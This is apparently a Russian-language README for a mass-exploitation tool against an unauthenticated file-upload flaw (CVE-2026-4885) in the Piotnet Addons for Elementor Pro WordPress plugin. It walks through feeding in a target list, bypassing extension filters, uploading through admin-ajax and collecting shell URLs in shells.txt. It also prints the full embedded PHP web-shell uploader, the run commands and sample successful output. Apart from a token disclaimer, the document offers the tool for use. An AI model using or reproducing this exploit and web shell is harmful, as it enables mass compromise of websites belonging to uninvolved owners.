
Piotnet Addons для Elementor Pro <= 7.1.70 - Неавторизованная произвольная загрузка файлов через форму
Неаутентифицированная произвольная загрузка файла, приводящая к удаленному выполнению кода (RCE) в Piotnet Addons for Elementor Pro ≤ 7.1.70.
Этот инструмент предназначен для массовой эксплуатации – передайте ему список целей, и он автоматически:
post_id, form_id и правильного имени поля загрузки.phtml, .php3, .php4, .phps, .pht, .php2) для обхода слабых фильтровpafe_export_databaseLogic_Internet) и сохранить URL в shells.txt⚠️ Отказ от ответственности
Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности.
Несанкционированное использование против систем, которые вам не принадлежат, незаконно.Больше информации об отказе от ответственности можно найти на обложке Jenderal92. Ознакомьтесь ЗДЕСЬ !!!
data-pafe-form-builder-field-name, data-elementor-id и др.)https://, если отсутствует/contact, /apply, /quote, /book-appointment, …)wp-content/uploads/piotnet-addons-for-elementor/, так и прямым корневым путямrequestspip install requests
git clone https://github.com/Jenderal92/CVE-2026-4885.git
cd CVE-2026-4885
Подготовьте файл с целями
Создайте файл с именем targets.txt (или любым другим) с одним URL на строку:
https://example1.com
example2.com
http://vulnerable-site.org
Запустите эксплойт
python2 CVE-2026-4885.py targets.txt
Скрипт будет:
shells.txt[*] Loaded built-in shell (598 bytes)
[*] scanning 25 pages...
[+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
[*] post_id=13 form_id=fa2c60e field=file
[*] trying .phtml
[+] uploaded .phtml
[+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
[+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
| Переменная | Описание | По умолчанию |
|---|---|---|
| TIMEOUT | HTTP-таймаут запроса | 10 секунд |
| MAX_THREADS | Количество одновременных потоков | 20 |
| OUTPUT_FILE | Куда сохранять успешные URL шеллов | shells.txt |
| EXT_LIST | Расширения файлов для попыток | .phtml, .php3, .php4, .phps, .pht, .php2 |
Вы можете изменить их, отредактировав начало скрипта.
Встроенный шелл:
GIF89a;
<?php
echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
Echo '<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center>'.'<br>';
if (!empty ($_FILES['uploads'])) {
move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
}
?>
SHELL_CODE в скрипте).?ver= в ресурсах плагина.post_id, form_id и правильное имя поля загрузки файла из специфичных для Piotnet HTML-атрибутов.wp-admin/admin-ajax.php?action=pafe_ajax_form_builder.EXT_LIST, пока одно не сработает.pafe_export_database, который возвращает CSV с полным URL загруженного файла.xxx-{random}.ext.Logic_Internet.shells.txt.Скрипт уже включает функцию safe_unicode(), которая обрабатывает не-ASCII символы. Если вы все еще видите ошибки, убедитесь, что ваш терминал поддерживает UTF-8:
chcp 65001
TIMEOUT или MAX_THREADS.pafe_export_database может быть отключена или защищена./wp-admin/admin-ajax.php?action=pafe_export_database, чтобы проверить доступность.